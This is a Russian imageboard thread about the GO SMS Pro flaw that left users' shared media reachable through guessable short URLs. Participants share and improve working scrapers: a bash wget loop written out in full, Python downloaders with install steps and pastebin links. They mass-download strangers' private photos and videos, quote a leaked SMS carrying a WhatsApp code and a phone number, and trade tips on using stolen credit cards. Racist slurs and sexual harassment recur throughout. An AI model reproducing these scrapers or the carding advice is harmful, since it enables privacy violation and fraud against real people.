>Исследователи компании Trustwave обнаружили уязвимость в приложении GO SMS Pro, установленном более 100 000 000 раз. Из-за бага мультимедийные файлы (голосовые сообщения, видео и изображения), которыми обмениваются пользователи, оказались доступны любому желающему. >С сервера приложения можно извлечь даже те файлы, которые предназначались для пользователей, на устройствах которых GO SMS Pro не установлено. Для этого нужно использовать сокращенный URL вида https://gs.3g[.]cn/D/dd1efd/w, который применяется для перенаправления к CDN, используемый приложением для общих файлов.
В чем суть? Случайным образом меняем ссылку, от 4 до 6 символов, 0-9, a-f и постим найденное ИТТ
=============================== Набросал скрипт на Python,для тех кто не в ладах с терминалом - https://pastebin.com/xdGGZU1L *Python 3 Возможно придется доустановить модуль requests pip install requests Если будет перекат добавь в шапку пожалуйста =============================== PHP
А вот и кривоватый скрипт на похапе. ВРУЧНУЮ создаёшь папку result рядом со скриптом, запускаешь скрипт и наслаждаешся как содержимое папки растёт. Чтобы остановить скрипт, надо создать рядом со скриптом файл stop.txt
>>233671091 (OP) https://pastebin.com/G62mFjaw GOSMS Downloader 2.0 Многопоточный,загружает исключительно фото и видео,сортирует по папкам в зависимости от типа файла,имеет приятный интерфейс,возможность задавать параметры через аргументы python GOSMS.py -c 1000 -t 10 (-c - количество заходов на скачивание ; -t - потоки),но так же возможно указание вручную уже при запущенном скрипте Python 3,требуеться модуль requests
Установка для глупых: 1. Устанавливаем питон 2. Устанавливаем requests (pip install requests в консоли) 3. Скачиваем скрипт и закидываем в удобную для нас папку, открываем папку в консоли и вводим то что выше
Выкачал 90 файлов за 30 секунд со своим колхозным интернетом
>>233671091 (OP) 1.Устанавливаем Python 3 из python.org 2.Ставим его с PIP 3.После установки,пишем pip install requests в командной строке и выполняем 3,Копируем текст скрипта с пастебин и сохраняем в файле с расширением .py (допустим GOSMS.py) 4.Запускаем cmd в той папке где лежит скрипт 5,Пишем python3 имя_файла.py (python GOSMS.py) 6.PROFIT
>>233671091 (OP) вот хуйня для браузера, никаких десктопов, открываешь страницу в комментарии, или любую другую с того сайта, затем консоль и вставляешь эту хуйню туда, вуаля https://pastebin.com/wrGGDWdn
Обновил скрипт. 1. Теперь можно настраивать какие форматы файлов качать, а какие нет. То есть делается сначала http-head. 2. Сам создаёт папки, сортирует файлы по папкам
ПАРСЕР ССЫЛОК ПОД ЛИНУКСОМ! СКАЧИВАТЬ ФАЙЛЫ АВТОМАТИЧЕСКИ БЕЗ РЕГИСТРАЦИИ И СМС! Создаём текстовый файл foo. Копируем туда: #!/bin/bash #for i in `seq 1 100` #do chars=$(head /dev/urandom | tr -dc 4-6 | head -c 1 ; echo '') link=$(head /dev/urandom | tr -dc a-f0-9 | head -c $chars ; echo '') mkdir $link cd $link wget https://gs.3g.cn/D/$link/c cd .. #done ЧТОБЫ ХУЯЧИТЬ МНОГО РАЗ, РАСКОММЕНТИРОВАТЬ 2, 3 И ПОСЛЕДНЮЮ СТРОЧКИ, ПРИ ЭТОМ ВО ВТОРОЙ СТРОКЕ ЗАМЕНИТЬ 100 НА НЕОБХОДИМОЕ КОЛ-ВО РАЗ. chmod +x foo ./foo
ЕСЛИ ПИШЕТ MISSING URL, ТО ПРОСТО ССЫЛКА НЕ ПОДОШЛА. ЖДИ, ПОКА ЗАЕБАШИТСЯ НОВАЯ. ЛИБО ЗАМЕНИ 4-6 НА 5-6, ТАК БОЛЬШЕ ШАНС.
>>233671417 Листинг чата. <SMS> <_id>2</_id> <address>+13853931515</address> <contactName>+13853931515</contactName> <date>1499972465950</date> <read>1</read> <status>-1</status> <type>1</type> <reply_path_present>0</reply_path_present> <body> WhatsApp code 455-323. You can also tap on this link to verify your phone: v.whatsapp.com/455323
вот хуйня для браузера, никаких десктопов, открываешь страницу в комментарии, или любую другую с того сайта, затем консоль и вставляешь эту хуйню туда, вуаля https://pastebin.com/wrGGDWdn
>>233671617 ты дегенерат тупой, ебало завали, ты знаешь что такое CORS? там нельзя иначе, к тому же, этот сраный айфрейм дает тебе возможность смотреть зипы и сразу ссылка на скачивание, так что хуй соси и внимай моему коду, куколд
>>233671091 (OP) Берите мой скрипт, пока даю. Никаких петушиных десктопов! Открываешь страницу в браузере (первая ссылка в пастбине или любую другую с того сайта), затем консоль и вставляешь эту хуйню туда, все. https://pastebin.com/wrGGDWdn
>>233671799 Да че ты так усираешься? Ну наговнокодил, красавчик, хули. Оставил это здесь и можешь уебывать дальше сосать хуи. А то разорался на весь бэ
Отлично, вчера ночью думал, что можно автоматизировать, сегодня гавнокодеры уже срутся за то, кто сделал это лучше. Я бы написал небольшой руби скрипт и запустил несколько его копий на разных диапазонах потенциальных урл.
Наговнокодили на чем попало, ебаные веб макаки. Задача то для повер шелла на форточках и баш/шелл для пингвиноподбных осей, лол. нет, блядь, мы из пушки по воробьям хуячить будем
>>233672394 дома все стандартно построены под ключ, практически никто кроме селюков каких-нибудь дома сами не строят, этим власти занимаются. Плюс там 80% жилья это арендное, свое там стоит бешеных бабок даже по меркам пиндосов
Собственно модель распознавания пёзд и хуев прикручена,но работать у меня она не сможет,да и вам не всем поможет,TensorFlow не работает на дешевых процессорах без AVX.И тащем-то даже с нейронкой и упакованым интерпретатором я так и не приблизился к 80 Мб как у сисярподибила
>>233672788 Дурной? Повершелл юзает ровно то же самое, что и твой шарп, придурок. Пош, это командный интерпретатор, часть нет фреймворк по сути. Ебать, такие ослы, а еще кодить пытаются... Ноги то побрил, а пробку в жопу вставил?
>>233673110 Возможно там регаться изи или еще как можно наебать приложуху, чтоб не палить свои данные. Вот быдло чернозадое тут как тут. Прям, как у нас впараше раньше было, лол
>>233673217 так у нас то такое было в протовремена, когда интернеты только начали на полную катушку появляться, это естественное течение событий было. негры что, рил настолько тупые чтоб в 2020 быть как русня в 2007? ну тупыыые
>>233673254 Вот он быстро спустил как. Я когда такое видео писал, минут 10 себя за хвостик подергивал и ласкал, притом, что с пробочкой был. Бака нигерская =(
>>233673658 Так это может магаз по типу вкуссвилл или азбуки вкуса. У нас там тоже молоко будет стоить 200 р за литр, хотя в соседней пятёрке такое же за 50 стоит, лол
>>233674111 Да вряд ли будут еще. Там ограничение в приложении было по-любому, чтоб файлопомойку не создавали там и малварь не распространяли всякие хитрые пидоры
>>233674098 Интересно как? Ты уж расскажи, гуру. Ну хорошо, можно грузить 10 файлов, потом обновлять с помощью meta refresh и снова грузить и т.д. Но хромог как-то замораживает вкладки чтоли, там нет уверенности что страница будет обновлятся.
В командной строке скрипт запускать не буду и выключать сервер тоже.
>все предусматривать заранее Так оно и предусмотрено. Включил забил, пришёл через час файлик создал и скрипт сам при обнаружении файла вырубится к хуям без изъёбств.
>>233674118 Скорей всего Монреаль или Виннипег. И почти вся продукция на полках - супер-экологичная фермерская, большинство не супер массовое производство.
>>233674458 Давай я тут буду зелени объяснять, как надо логику скриптов пилить. Ты там нормальный? Гугл в зубы и пиздуй, учи мат часть. На своей шеи никто тебя тащить не будет
>>233674763 Каким Хантером. Я говорю про то что среди 100 млн пользователей пара миллионов которые уважаемые люди наверняка засветились. Не своими хуями кстати, а документами какими-нибудь или т.п.
>>233675659 >>233675645 >>233675635 >>233675588 >>233675584 >>233675537 >>233671091 (OP) И всё остальное. В чем смысл? Это же обычные фотографии рандомных людей, которые не представляют никакого интереса. С таким же успехом можно загуглить "частные фото" и смотреть их. Неужели элемента "мам, я хакер, ууу" достаточно, чтобы этот говнотреад висел на нулевой, и чтобы тратить время на поиск хуевых фотографий? Вы ебанутые?
>>233675897 Меня не возбуждает дрочка на порно, которое снималось профессионально/снималось для выкладывания в публичное пространство. А так есть чувство словно ты следишь за жизнью других людей. У тебя была хоть раз такое чувство когда хочется, чтобы время замерло и ты мог походить по чужим квартирам? Просто зайти посмотреть, как они живут, чем занимаются, что любят.
>>233676012 Надо знать страну,потом подбери прокси/впн с хорошей репутацией и попробуй что-нибудь вбить вбивать лучше с телефона или эмулятора типа нокс эпп - больше шанс что залетит Тк баланс не известен,то на удачу Я бы вбил патреон какой-нибудь >>233676084 есть магазины в которых не требуется 3д секьюр алиэкспресс например
>>233676112 Не, там не в этом дело. 3дсекьюр нужен всегда, если сумма оплаты выше 1к к примеру для рашкэ. Это надо лимиты нагуглить конкретно на этот банк и тип карты
>>233676371 дельный совет Но вообще оп забей Оно там будет и адрес просить скорее всего в платежке,а у тебя его нет купи просто этих кард и вбивай-они все равно копейки стоят
>>233676365 Ладно, на вид обычный белый муриканец, который вкалывает 24/7, вечером пьёт пиво и смотрит как сосёт его любмая команда по футболу. Оставим его.
>>233671091 (OP) Как думаете, нарыть что-то стоящее, кроме негрильных жоп, реально? Насколько туп может быть юзер, чтобы хранить у себя на телефоне логинов-пароль от бетховен кошелька, например?
>>233676314 Знаешь, нет. Иногда бывает прохладно сидеть с голыми ногами почему то. Хотя в квартире 24 градуса и да, я не тян! Губы то подзакатайте свои
>>233676666 Чел я этой хуйней маюсь часов 8,ничего кроме изредка паролей от всякого говна и кредитных карт нихуя нет,искать что то стоящее это нереально.
>>233677870 Эту? Нет. Тебя быстро забанят к хуям. Максимум минут 20 кайфанешь, потом мыло твой ботнет быстро на пограничниках порежет и отрепортит товарищу майору
Ребят, а почему здесь одни ниггеры? Мне реально очень интересно. Это типа мессенджера ведь? Нахуй они его используют, когда есть телеграммы всякие и вацапы?
>>233678309 Нет. Бля, треть треда пролистал, и могу сказать, что ни на кого из них шишка не встаёт - пиздец. Они еще и в партаках дешёвых отвратительных, а я баб с татуировками в принципе не люблю
>>233678356 За бугром тоже, если что. И, похоже, не меньше, чем у нас. Ну а тг вообще по всему миру используют, нахрен вот этот говнософт сомнительный, когда есть тг?
Хотя... Теперь понятно, почему тут одни негры)))))))))))))))))))))))))))
>>233678536 ТГ как раз популярен в странах, где цензура интернета: Иран, Раха, в Белорахе вон вообще самые массовые русскоязычные каналы. На Западе больше Вотсапп.
>>233678450 Привыкай, белая сучка. Нигеры - доминантный тип людей теперь. Брей жопку, натягивай чулки, платьюшко, паричок с алика, крась губки и готовься обслуживать толстый, сочный хуй своего нигерского господина
Изменения: -Добавлен разархиватор =Добавлен фильтр по типам файлов, теперь можно выбирать типы, которые вы не хотите качать -Добавлена сортировка по папкам -Исправлены некоторые ошибки и баги
Где после -o идёт путь к папке Где после -c идёт количество ссылок Где после -t идёт количество потоков Где после -no идёт запрет на тип --unpack включает автоматический разархиватор --sort включает сортировку
Все параметры являются необязательными, запуск gosms_dl.py так же будет работать
>>233679526 1.Устанавливаем Python 3 из python.org 2.Ставим его с PIP 3.После установки,пишем pip install requests в командной строке и выполняем 3,Копируем текст скрипта с пастебин и сохраняем в файле с расширением .py (допустим GOSMS.py) 4.Запускаем cmd в той папке где лежит скрипт 5,Пишем python3 имя_файла.py (python GOSMS.py) 6.PROFIT
>>233680310 А как по-твоему, кто будет пользовать абсолютно незащищенный мессенджер, откуда можно выкачивать чужие файлы в многопотоке? Самый тупой контингент.
>>233680425 Добавь ещё проверку, чтобы файлы, которые уже скачаны, не качались заново. Лучше базу какую-нибудь сделать в виде txt, и там прописать уже скачанные урлы.
>>233680558 >Ну ватсапом же не только нигеры пользуется, хотя он дырявое и кривое говно. Есть вариант повыкачивать данные рандом-юзеров с серверов ватсапа?
Ватсап говно, но не настолько говно, как вот эта хрень. Да, телега, например, лучше ватсапа. А ватсап лучше этой шняги. Умные нигеры пользуются Ватсапом, 4 самых умных - телеграммом. Тупые нигеры сидят в госмс.